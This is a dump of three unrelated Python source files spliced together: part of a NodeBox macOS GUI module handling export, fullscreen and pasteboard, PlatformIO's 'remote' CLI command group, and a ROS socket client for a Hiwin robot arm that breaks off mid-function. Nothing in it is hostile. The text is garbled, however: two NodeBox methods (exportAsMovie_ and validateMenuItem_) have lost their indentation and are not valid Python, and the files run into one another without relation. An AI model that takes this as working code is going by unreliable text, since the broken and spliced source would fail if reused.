        # Sheet callback: kick off the actual export when confirmed.
        if returnCode:
            fname = panel.filename()
            self.exportDir = os.path.split(fname)[0] # Save the directory we exported to.
            pages = self.exportImagePageCount.intValue()
            format = panel.requiredFileType()
            panel.close()
            self.doExportAsImage(fname, format, pages)
    # Register the Objective-C selector signature for the sheet callback.
    exportPanelDidEnd_returnCode_contextInfo_ = objc.selector(exportPanelDidEnd_returnCode_contextInfo_,
        signature="v@:@ii")

    def exportImageFormatChanged_(self, sender):
        # Keep the panel's required file type in sync with the format popup.
        image_formats = ('pdf', 'png', 'tiff', 'jpg')
        panel = sender.window()
        panel.setRequiredFileType_(image_formats[sender.indexOfSelectedItem()])
    def doExportAsImage(self, fname, format, pages=1):
        """Export the current graphics to one or more image files.

        fname  -- destination path chosen in the save panel
        format -- 'pdf', 'png', 'tiff' or 'jpg' (set by exportImageFormatChanged_)
        pages  -- number of pages to render; multi-page export re-runs the
                  script per page with a fresh random seed and writes
                  basename-00001.ext, basename-00002.ext, ...
        """
        basename, ext = os.path.splitext(fname)
        # When saving one page (the default), just save the current graphics
        # context. When generating multiple pages, we run the script again
        # (so we don't use the current displayed view) for the first page,
        # and then for every next page.
        if pages == 1:
            if not self.graphicsView.pdfData:
                self.runScript_()
            if format == 'pdf':
                pdfData = self.graphicsView.pdfData
                pdfData.writeToFile_atomically_(fname , False)
            else:
                self.canvas.save(fname, format)
        elif pages > 1:
            pb = ProgressBarController.alloc().init()
            pb.begin("Generating %s PDF files..." % pages, pages)
            try:
                if not self.cleanRun(self._execScript): return
                self._pageNumber = 1
                self._frame = 1
                # If the speed is set, we are dealing with animation
                if self.canvas.speed is None:
                    for i in range(pages):
                        if i > 0: # Run has already happened first time
                            self.fastRun(self._execScript, newSeed=True)
                        # Build a zero-padded page suffix, e.g. "-00001".
                        counterAsString = "-%5d" % self._pageNumber
                        counterAsString = counterAsString.replace(' ', '0')
                        exportName = basename + counterAsString + ext
                        if ext == '.pdf':
                            pdfData = self.graphicsView.pdfData
                            pdfData.writeToFile_atomically_(exportName, False)
                        else:
                            self.canvas.save(exportName, format)
                        self.graphicsView.setNeedsDisplay_(True)
                        self._pageNumber += 1
                        self._frame += 1
                        pb.inc()
                else:
                    # Animation: run setup once (if present), then draw per page.
                    if self.namespace.has_key("setup"):
                        self.fastRun(self.namespace["setup"])
                    for i in range(pages):
                        self.fastRun(self.namespace["draw"], newSeed=True)
                        counterAsString = "-%5d" % self._pageNumber
                        counterAsString = counterAsString.replace(' ', '0')
                        exportName = basename + counterAsString + ext
                        if ext == '.pdf':
                            pdfData = self.graphicsView.pdfData
                            pdfData.writeToFile_atomically_(exportName, False)
                        else:
                            self.canvas.save(exportName, format)
                        self.graphicsView.setNeedsDisplay_(True)
                        self._pageNumber += 1
                        self._frame += 1
                        pb.inc()
                        #self.exportSheetProgress.setDoubleValue_(i)
            except KeyboardInterrupt:
                # User aborted: fall through and close the progress bar.
                pass
            pb.end()
            del pb
            self._pageNumber = 1
            self._frame = 1
    def handleExportScriptCommand_(self, command):
        """AppleScript 'export' command handler.

        Reads optional arguments (ftype, fname, frames/pages, framerate) and
        dispatches to doExportToPDF or doExportToQuickTime.
        NOTE(review): the debug prints below look like leftovers from
        development -- consider removing them.
        """
        print "ARGS"
        print command.arguments()
        print "FFF"
        try:
            print command.arguments()['File']
            print command.arguments()['File'].__class__.__name__
        except KeyError:
            print "F NOT FOUND"
        print "KEYS"
        print command.arguments().allKeys()
        print "VALUES"
        print command.arguments().allValues()
        print "CLASS"
        print command.__class__.__name__
        if command:
            args = command.arguments()
            # Defaults: PDF export, frame count decided per type, 30 fps.
            ftype = PDF
            fcount = None
            fps = 30
            if args.has_key('ftype'):
                ftype = args['ftype']
            fname = None
            if args.has_key('fname'):
                f = args['fname']
                if f.isFileURL():
                    fname = f.path()
            # 'frames' and 'pages' are synonyms; the later key wins.
            if args.has_key('frames'):
                fcount = args['frames']
            if args.has_key('pages'):
                fcount = args['pages']
            if args.has_key('framerate'):
                fps = args['framerate']
            print fname
            if fname:
                if ftype == PDF:
                    if fcount is None: fcount = 1
                    self.doExportToPDF(fname, fcount)
                elif ftype == QUICKTIME:
                    if fcount is None: fcount = 60
                    self.doExportToQuickTime(fname, fcount, fps)
def exportAsMovie_(self, sender):
exportPanel = NSSavePanel.savePanel()
exportPanel.setRequiredFileType_("pdf")
exportPanel.setNameFieldLabel_("Export To:")
exportPanel.setPrompt_("Export")
exportPanel.setCanSelectHiddenExtension_(True)
exportPanel.setAllowedFileTypes_(["mov"])
if not NSBundle.loadNibNamed_owner_("ExportMovieAccessory", self):
NSLog("Error -- could not load ExportMovieAccessory.")
self.exportMovieFrames.setIntValue_(150)
self.exportMovieFps.setIntValue_(30)
exportPanel.setAccessoryView_(self.exportMovieAccessory)
path = self.fileName()
if path:
dirName, fileName = os.path.split(path)
fileName, ext = os.path.splitext(fileName)
fileName += ".mov"
else:
dirName, fileName = None, "Untitled.mov"
# If a file was already exported, use that folder as the default.
if self.exportDir is not None:
dirName = self.exportDir
exportPanel.beginSheetForDirectory_file_modalForWindow_modalDelegate_didEndSelector_contextInfo_(
dirName, fileName, NSApp().mainWindow(), self,
"qtPanelDidEnd:returnCode:contextInfo:", 0)
    def qtPanelDidEnd_returnCode_contextInfo_(self, panel, returnCode, context):
        """Sheet callback for exportAsMovie_: start the movie export."""
        if returnCode:
            fname = panel.filename()
            self.exportDir = os.path.split(fname)[0] # Save the directory we exported to.
            frames = self.exportMovieFrames.intValue()
            fps = self.exportMovieFps.floatValue()
            panel.close()
            # Guard against nonsensical accessory-view input.
            if frames <= 0 or fps <= 0: return
            self.doExportAsMovie(fname, frames, fps)
    # Objective-C type signature: void return; object, int, int arguments.
    qtPanelDidEnd_returnCode_contextInfo_ = objc.selector(qtPanelDidEnd_returnCode_contextInfo_,
        signature="v@:@ii")
    def doExportAsMovie(self, fname, frames=60, fps=30):
        """Render the script `frames` times and write a QuickTime movie.

        fname  -- destination .mov path (pre-created to verify writability)
        frames -- number of frames to render
        fps    -- playback frame rate handed to QTSupport.Movie
        """
        # Remove any stale file, then probe that the path is writable before
        # doing any expensive rendering.
        try:
            os.unlink(fname)
        # NOTE(review): bare except -- intentionally best-effort (file may not
        # exist), but it also hides unexpected errors.
        except:
            pass
        try:
            fp = open(fname, 'w')
            fp.close()
        except:
            errorAlert("File Error", "Could not create file '%s'. Perhaps it is locked or busy." % fname)
            return
        movie = None
        pb = ProgressBarController.alloc().init()
        pb.begin("Generating %s frames..." % frames, frames)
        try:
            if not self.cleanRun(self._execScript): return
            self._pageNumber = 1
            self._frame = 1
            movie = QTSupport.Movie(fname, fps)
            # If the speed is set, we are dealing with animation
            if self.canvas.speed is None:
                for i in range(frames):
                    if i > 0: # Run has already happened first time
                        self.fastRun(self._execScript, newSeed=True)
                    movie.add(self.canvas)
                    self.graphicsView.setNeedsDisplay_(True)
                    pb.inc()
                    self._pageNumber += 1
                    self._frame += 1
            else:
                # Animation: run setup once (if present), then draw per frame.
                if self.namespace.has_key("setup"):
                    self.fastRun(self.namespace["setup"])
                for i in range(frames):
                    self.fastRun(self.namespace["draw"], newSeed=True)
                    movie.add(self.canvas)
                    self.graphicsView.setNeedsDisplay_(True)
                    pb.inc()
                    self._pageNumber += 1
                    self._frame += 1
        except KeyboardInterrupt:
            # User aborted: save whatever was rendered so far.
            pass
        pb.end()
        del pb
        movie.save()
        self._pageNumber = 1
        self._frame = 1
    def printDocument_(self, sender):
        """Run the standard print panel (as a sheet) for the graphics view."""
        op = NSPrintOperation.printOperationWithView_printInfo_(self.graphicsView, self.printInfo())
        op.runOperationModalForWindow_delegate_didRunSelector_contextInfo_(
            NSApp().mainWindow(), self, "printOperationDidRun:success:contextInfo:",
            0)
    def printOperationDidRun_success_contextInfo_(self, op, success, info):
        """Persist the print settings the user chose in the print panel."""
        if success:
            self.setPrintInfo_(op.printInfo())
    # Objective-C type signature: void return; object, BOOL (char), int args.
    printOperationDidRun_success_contextInfo_ = objc.selector(printOperationDidRun_success_contextInfo_,
        signature="v@:@ci")
    def buildInterface_(self):
        """Rebuild the dashboard controls from the script's var() declarations."""
        self.dashboardController.buildInterface_(self.vars)
def validateMenuItem_(self, menuItem):
if menuItem.action() in ("exportAsImage:", "exportAsMovie:"):
return self.canvas is not None
return True
class FullscreenWindow(NibClassBuilder.AutoBaseClass):
    """Borderless, screen-covering window used for fullscreen playback."""
    def init(self, fullRect):
        # NOTE(review): non-standard init signature (takes fullRect); callers
        # must use FullscreenWindow.alloc().init(fullRect).
        super(FullscreenWindow, self).initWithContentRect_styleMask_backing_defer_(fullRect, NSBorderlessWindowMask, NSBackingStoreBuffered, True)
        return self
    def canBecomeKeyWindow(self):
        # Borderless windows refuse key status by default; override so the
        # fullscreen window still receives keyboard events.
        return True
class FullscreenView(NibClassBuilder.AutoBaseClass):
    """View that draws a canvas scaled and centered on a black fullscreen.

    Also records mouse/keyboard/scroll state so running scripts can poll it.
    """
    def init(self):
        super(FullscreenView, self).init()
        # Input state polled by running scripts.
        self.mousedown = False
        self.keydown = False
        self.key = None
        self.keycode = None
        self.scrollwheel = False
        self.wheeldelta = 0.0
        return self
    def setCanvas(self, canvas):
        """Adopt a canvas and precompute the scale/centering transform."""
        self.canvas = canvas
        self.setNeedsDisplay_(True)
        if not hasattr(self, "screenRect"):
            # Cache the screen geometry once; frame() returns (origin, size).
            self.screenRect = NSScreen.mainScreen().frame()
            cw, ch = self.canvas.size
            sw, sh = self.screenRect[1]
            self.scalingFactor = calc_scaling_factor(cw, ch, sw, sh)
            nw, nh = cw * self.scalingFactor, ch * self.scalingFactor
            self.scaledSize = nw, nh
            # Offsets that center the scaled canvas on screen.
            self.dx = (sw - nw) / 2.0
            self.dy = (sh - nh) / 2.0
    def drawRect_(self, rect):
        # Black background, then the canvas translated/scaled into place and
        # clipped to its own bounds.
        NSGraphicsContext.currentContext().saveGraphicsState()
        NSColor.blackColor().set()
        NSRectFill(rect)
        if self.canvas is not None:
            t = NSAffineTransform.transform()
            t.translateXBy_yBy_(self.dx, self.dy)
            t.scaleBy_(self.scalingFactor)
            t.concat()
            clip = NSBezierPath.bezierPathWithRect_( ((0, 0), (self.canvas.width, self.canvas.height)) )
            clip.addClip()
            self.canvas.draw()
        NSGraphicsContext.currentContext().restoreGraphicsState()
    def isFlipped(self):
        # NodeBox canvases use a top-left origin.
        return True
    def mouseDown_(self, event):
        self.mousedown = True
    def mouseUp_(self, event):
        self.mousedown = False
    def keyDown_(self, event):
        self.keydown = True
        self.key = event.characters()
        self.keycode = event.keyCode()
    def keyUp_(self, event):
        self.keydown = False
        self.key = event.characters()
        self.keycode = event.keyCode()
    def scrollWheel_(self, event):
        self.scrollwheel = True
        self.wheeldelta = event.deltaY()
    def canBecomeKeyView(self):
        return True
    def acceptsFirstResponder(self):
        # Required so key events reach this view in fullscreen mode.
        return True
def calc_scaling_factor(width, height, maxwidth, maxheight):
    """Return the largest uniform scale fitting (width, height) inside
    (maxwidth, maxheight).

    Bug fix: the old code picked the ratio based only on which *source*
    dimension was larger, which overflows the bounding box whenever the
    aspect ratios differ (e.g. an 800x600 canvas on a 1920x1080 screen
    scaled by 2.4 and spilled 360px past the bottom). Standard aspect-fit
    takes the minimum of the two ratios.
    """
    return min(float(maxwidth) / width, float(maxheight) / height)
# class defined in NodeBoxGraphicsView.nib
class NodeBoxGraphicsView(NibClassBuilder.AutoBaseClass):
    """Canvas view for a NodeBox document.

    The actual base class is NSView; the `document` outlet is connected in
    the nib. Also records mouse/keyboard/scroll state for running scripts.
    """

    def awakeFromNib(self):
        self.canvas = None
        self._image = None   # cached NSImage of the canvas
        self._dirty = False  # cache invalid?
        # Input state polled by running scripts.
        self.mousedown = False
        self.keydown = False
        self.key = None
        self.keycode = None
        self.scrollwheel = False
        self.wheeldelta = 0.0
        self.setFrameSize_( (graphics.DEFAULT_WIDTH, graphics.DEFAULT_HEIGHT) )
        self.setFocusRingType_(NSFocusRingTypeExterior)
        if self.superview() is not None:
            self.superview().setBackgroundColor_(VERY_LIGHT_GRAY)

    def setCanvas(self, canvas):
        """Adopt a canvas, resizing the view to match when needed."""
        self.canvas = canvas
        if self.frame()[1] != self.canvas.size:
            self.setFrameSize_(self.canvas.size)
        self.markDirty()

    def markDirty(self, redraw=True):
        # Invalidate the cached image; optionally schedule a redraw.
        self._dirty = True
        if redraw:
            self.setNeedsDisplay_(True)

    def setFrameSize_(self, size):
        self._image = None  # cached image no longer matches the frame
        NSView.setFrameSize_(self, size)

    def isOpaque(self):
        return False

    def isFlipped(self):
        # NodeBox canvases use a top-left origin.
        return True

    def drawRect_(self, rect):
        if self.canvas is not None:
            NSGraphicsContext.currentContext().saveGraphicsState()
            try:
                self.canvas.draw()
            # NOTE(review): bare except is deliberate here -- any error the
            # script raises while drawing must be shown, not crash the view.
            except:
                # A lot of code just to display the error in the output view.
                etype, value, tb = sys.exc_info()
                if tb.tb_next is not None:
                    tb = tb.tb_next # skip the frame doing the exec
                traceback.print_exception(etype, value, tb)
                data = "".join(traceback.format_exception(etype, value, tb))
                attrs = PyDETextView.getBasicTextAttributes()
                attrs[NSForegroundColorAttributeName] = NSColor.redColor()
                outputView = self.document.outputView
                outputView.setSelectedRange_((outputView.textStorage().length(), 0))
                outputView.setTypingAttributes_(attrs)
                outputView.insertText_(data)
            NSGraphicsContext.currentContext().restoreGraphicsState()

    def _updateImage(self):
        # Refresh the cached NSImage from the canvas when marked dirty.
        if self._dirty:
            self._image = self.canvas._nsImage
            self._dirty = False

    # pasteboard delegate method
    def pasteboard_provideDataForType_(self, pboard, type):
        """Supply PDF/EPS/TIFF data on demand for copyImageAsPDF_.

        Bug fix: the original tested the truthiness of the type *constants*
        (`if NSPDFPboardType:`), so every request was answered with PDF data
        regardless of the type asked for. Compare against the requested type.
        """
        if type == NSPDFPboardType:
            pboard.setData_forType_(self.pdfData, NSPDFPboardType)
        elif type == NSPostScriptPboardType:
            pboard.setData_forType_(self.epsData, NSPostScriptPboardType)
        elif type == NSTIFFPboardType:
            pboard.setData_forType_(self.tiffData, NSTIFFPboardType)

    def _get_pdfData(self):
        # PDF bytes for the current canvas (None when there is no canvas).
        if self.canvas:
            return self.dataWithPDFInsideRect_(((0, 0), self.canvas.size))
    pdfData = property(_get_pdfData)

    def _get_epsData(self):
        # EPS bytes for the current canvas (None when there is no canvas).
        if self.canvas:
            return self.dataWithEPSInsideRect_(((0, 0), self.canvas.size))
    epsData = property(_get_epsData)

    def _get_tiffData(self):
        return self.image.TIFFRepresentation()
    tiffData = property(_get_tiffData)

    def _get_pngData(self):
        return NSBitmapImageRep.imageRepWithData_(self.tiffData).representationUsingType_properties_(NSPNGFileType, None)
    pngData = property(_get_pngData)

    def _get_gifData(self):
        return NSBitmapImageRep.imageRepWithData_(self.tiffData).representationUsingType_properties_(NSGIFFileType, None)
    gifData = property(_get_gifData)

    def _get_jpegData(self):
        return NSBitmapImageRep.imageRepWithData_(self.tiffData).representationUsingType_properties_(NSJPEGFileType, None)
    jpegData = property(_get_jpegData)

    def _get_image(self):
        if self.canvas is not None:
            self._updateImage()
            return self._image
        else:
            # Bug fix: `bounds` is a method in PyObjC and must be called
            # before indexing (cf. `self.frame()[1]` in setCanvas); the
            # original indexed the unbound method object.
            return NSImage.alloc().initWithSize_(self.bounds()[1])
    image = property(_get_image)

    def mouseDown_(self, event):
        self.mousedown = True

    def mouseUp_(self, event):
        self.mousedown = False

    def keyDown_(self, event):
        self.keydown = True
        self.key = event.characters()
        self.keycode = event.keyCode()

    def keyUp_(self, event):
        self.keydown = False
        self.key = event.characters()
        self.keycode = event.keyCode()

    def scrollWheel_(self, event):
        self.scrollwheel = True
        self.wheeldelta = event.deltaY()

    def canBecomeKeyView(self):
        return True

    def acceptsFirstResponder(self):
        # Required so key events reach this view.
        return True
class NodeBoxAppDelegate(NibClassBuilder.AutoBaseClass):
    """Application delegate: sets up the user library folder and app menus."""
    def awakeFromNib(self):
        self._prefsController = None
        # NOTE(review): os.getenv("HOME") can be None in odd environments,
        # which would make os.path.join raise -- confirm this never runs
        # outside a normal user session.
        libDir = os.path.join(os.getenv("HOME"), "Library", "Application Support", "NodeBox")
        try:
            if not os.path.exists(libDir):
                os.mkdir(libDir)
                f = open(os.path.join(libDir, "README"), "w")
                f.write("In this directory, you can put Python libraries to make them available to your scripts.\n")
                f.close()
        # Best effort: a missing library folder is not fatal.
        except OSError: pass
        except IOError: pass
    def showPreferencesPanel_(self, sender):
        """Lazily create and show the preferences window."""
        if self._prefsController is None:
            from nodebox.gui.mac.preferences import NodeBoxPreferencesController
            self._prefsController = NodeBoxPreferencesController.alloc().init()
        self._prefsController.showWindow_(sender)
    def generateCode_(self, sender):
        """Generate a piece of NodeBox code using OttoBot"""
        from nodebox.util.ottobot import genProgram
        controller = NSDocumentController.sharedDocumentController()
        doc = controller.newDocument_(sender)
        doc = controller.currentDocument()
        doc.textView.setString_(genProgram())
        doc.runScript_()
    def showSite_(self, sender):
        """Open the NodeBox website in the default browser."""
        url = NSURL.URLWithString_("http://nodebox.net/")
        NSWorkspace.sharedWorkspace().openURL_(url)
|
remote.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, fs
from platformio.commands.device import helpers as device_helpers
from platformio.commands.device.command import device_monitor as cmd_device_monitor
from platformio.managers.core import pioplus_call
from platformio.project.exception import NotPlatformIOProjectError
# pylint: disable=unused-argument
# NOTE: these commands carry no docstrings on purpose -- click would surface
# a docstring as CLI help text and change the user-visible output. All real
# work is delegated to the PIO Plus binary via pioplus_call().
@click.group("remote", short_help="PIO Remote")
@click.option("-a", "--agent", multiple=True)
def cli(**kwargs):
    # Root `pio remote` command group.
    pass
@cli.group("agent", short_help="Start new agent or list active")
def remote_agent():
    # `pio remote agent` subgroup.
    pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
    "-d",
    "--working-dir",
    envvar="PLATFORMIO_REMOTE_AGENT_DIR",
    type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(**kwargs):
    # Delegate to PIO Plus; the original argv is forwarded unchanged.
    pioplus_call(sys.argv[1:])
@remote_agent.command("reload", short_help="Reload agents")
def remote_agent_reload():
    # Delegate to PIO Plus.
    pioplus_call(sys.argv[1:])
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
    # Delegate to PIO Plus.
    pioplus_call(sys.argv[1:])
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
    "-c",
    "--only-check",
    is_flag=True,
    help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
    "--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
def remote_update(only_check, dry_run):
    # Delegate to PIO Plus; options are parsed again on the remote side.
    pioplus_call(sys.argv[1:])
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(
        exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
def remote_run(**kwargs):
    # Delegate to PIO Plus; the original argv is forwarded unchanged.
    pioplus_call(sys.argv[1:])
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(
        exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
def remote_test(**kwargs):
    # Delegate to PIO Plus; the original argv is forwarded unchanged.
    pioplus_call(sys.argv[1:])
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
    # `pio remote device` subgroup.
    pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
def device_list(json_output):
    # Delegate to PIO Plus.
    pioplus_call(sys.argv[1:])
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
    "--parity",
    default="N",
    type=click.Choice(["N", "E", "O", "S", "M"]),
    help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
    "--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
    "--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
    "--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
    "--encoding",
    default="UTF-8",
    help="Set the encoding for the serial port (e.g. hexlify, "
    "Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
    "--eol",
    default="CRLF",
    type=click.Choice(["CR", "LF", "CRLF"]),
    help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
    "--exit-char",
    type=int,
    default=3,
    help="ASCII code of special character that is used to exit "
    "the application, default=3 (Ctrl+C)",
)
@click.option(
    "--menu-char",
    type=int,
    default=20,
    help="ASCII code of special character that is used to "
    "control miniterm (menu), default=20 (DEC)",
)
@click.option(
    "--quiet",
    is_flag=True,
    help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
    "-e",
    "--environment",
    help="Load configuration from `platformio.ini` and specified environment",
)
@click.pass_context
def device_monitor(ctx, **kwargs):
    # Bridge a remote serial monitor to the local `device monitor` command.
    # Flow: merge monitor options from platformio.ini (if in a project),
    # start the PIO Plus tunnel in a background thread, wait for it to write
    # the forwarded port into a sock file, then attach the local monitor.
    project_options = {}
    try:
        with fs.cd(kwargs["project_dir"]):
            project_options = device_helpers.get_project_options(kwargs["environment"])
        kwargs = device_helpers.apply_project_monitor_options(kwargs, project_options)
    except NotPlatformIOProjectError:
        # Not inside a project: proceed with the command-line options only.
        pass
    kwargs["baud"] = kwargs["baud"] or 9600
    def _tx_target(sock_dir):
        # Runs in the background thread: start the PIO Plus tunnel, telling
        # it where to publish the forwarded port (the sock file).
        pioplus_argv = ["remote", "device", "monitor"]
        pioplus_argv.extend(device_helpers.options_to_argv(kwargs, project_options))
        pioplus_argv.extend(["--sock", sock_dir])
        try:
            pioplus_call(pioplus_argv)
        except exception.ReturnErrorCode:
            pass
    sock_dir = mkdtemp(suffix="pioplus")
    sock_file = os.path.join(sock_dir, "sock")
    try:
        t = threading.Thread(target=_tx_target, args=(sock_dir,))
        t.start()
        # Poll until the tunnel publishes the forwarded port (or dies).
        while t.is_alive() and not os.path.isfile(sock_file):
            sleep(0.1)
        if not t.is_alive():
            return
        with open(sock_file) as fp:
            kwargs["port"] = fp.read()
        ctx.invoke(cmd_device_monitor, **kwargs)
        t.join(2)
    finally:
        fs.rmtree(sock_dir)
|
Hiwin_RT605_ArmCommand_Socket_20190627173531.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
# Feedback counters (currently unused bookkeeping).
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
# Receive commands from the strategy side and forward them over a socket
# to the control-side PC.
import socket
## multithreading support
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0 # socket object; replaced with a real socket in socket_client()
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy at start-up
NAME = 'socket_server'
##------------class pos-------
class point():
    """Mutable six-component pose: position (x, y, z) plus orientation
    (pitch, roll, yaw)."""
    def __init__(self, x, y, z, pitch, roll, yaw):
        self.x, self.y, self.z = x, y, z
        self.pitch, self.roll, self.yaw = pitch, roll, yaw
# Shared pose updated by point_data() and read by Socket_command().
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
    """Command-packet state shared between the ROS callbacks and the
    socket sender."""
    _FIELDS = ("grip", "setvel", "ra", "delay", "setboth", "action", "Speedmode")
    def __init__(self, grip, setvel, ra, delay, setboth, action, Speedmode):
        values = (grip, setvel, ra, delay, setboth, action, Speedmode)
        for name, value in zip(self._FIELDS, values):
            setattr(self, name, value)
# Shared command state mutated by Arm_Mode()/Speed_Mode().
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
    """Poor man's switch/case.

    Usage::
        for case in switch(value):
            if case(A): ...; break
            if case(B): ...; break

    Iterating yields the ``match`` callable exactly once; after a case has
    matched, every later call (including ``case()``, the default) returns
    True so cases can fall through.
    """
    def __init__(self, value):
        self.value = value
        self.fall = False  # True once some case has matched (fall-through)
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        # Bug fix: `raise StopIteration` inside a generator is converted to
        # RuntimeError by PEP 479 (Python 3.7+), which made every
        # `for case in switch(...)` loop crash. A plain return ends the
        # generator cleanly and is equivalent on all versions.
        return
    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args: # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
class StateFeedback():
    """Latest arm state and sent-flag reported by the control-side PC."""
    def __init__(self, ArmState, SentFlag):
        self.ArmState, self.SentFlag = ArmState, SentFlag
# Shared feedback state: written by socket_client(), published by socket_talker().
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data from the strategy side
    """Store the received pose on the shared `pos` object.

    Each component is converted to its string form (as the TCP command
    builder expects) before being assigned.
    """
    components = zip(("x", "y", "z", "pitch", "roll", "yaw"),
                     (x, y, z, pitch, roll, yaw))
    for name, value in components:
        setattr(pos, name, '%s' % value)
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data from the strategy side
    """Store the received mode fields on socket_cmd (as ints) and trigger
    Socket_command() to build and send the TCP packet."""
    global arm_mode_flag
    socket_cmd.action = int('%s'%action)
    socket_cmd.grip = int('%s'%grip)
    socket_cmd.ra = int('%s'%ra)
    socket_cmd.setvel = int('%s'%setvel)
    socket_cmd.setboth = int('%s'%setboth)
    arm_mode_flag = True
    print("sssss:",socket_cmd.action)
    Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data from the strategy side
    """Record the requested speed mode (fast/safe) on socket_cmd."""
    # NOTE(review): speed_mode_flag is declared global but never assigned here.
    global speed_mode_flag
    socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ## receive gripper action data from the strategy side
#     socket_cmd.grip = int('%s'%req.grip)
#     return(1)
def socket_talker(): ## create the server node
    """ROS publisher loop: publish [ArmState, SentFlag] on 'chatter' at 10 Hz
    until the node is shut down."""
    pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
    rospy.init_node(NAME)
    rate = rospy.Rate(10) # 10hz
    print ("Ready to connect")
    while not rospy.is_shutdown():
        # hello_str = "hello world %s" % rospy.get_time()
        state = Int32MultiArray()
        # state_feedback is updated concurrently by the socket_client thread.
        state.data = [state_feedback.ArmState,state_feedback.SentFlag]
        # rospy.loginfo(state)
        pub.publish(state)
        rate.sleep()
    # a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
    # s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
    # b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
    #c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
    #print ("Ready to connect")
    #rospy.spin() ## spin one
##------------server side end-------
##----------socket packet transmission--------------##
##---------------send arm commands over the socket-----------------
def Socket_command():
    """Build the TCP command string for the pending socket_cmd and send it.

    Dispatches on socket_cmd.action (PtoP / Line / SetVel / Delay / Mode)
    and, for motion commands, on socket_cmd.setboth (position / euler /
    both). Resets socket_cmd.action to the idle value afterwards.
    """
    global Socket,arm_mode_flag
    if arm_mode_flag == True:
        arm_mode_flag = False
        for case in switch(socket_cmd.action):
            #-------PtP Mode--------
            if case(Taskcmd.Action_Type.PtoP):
                for case in switch(socket_cmd.setboth):
                    if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
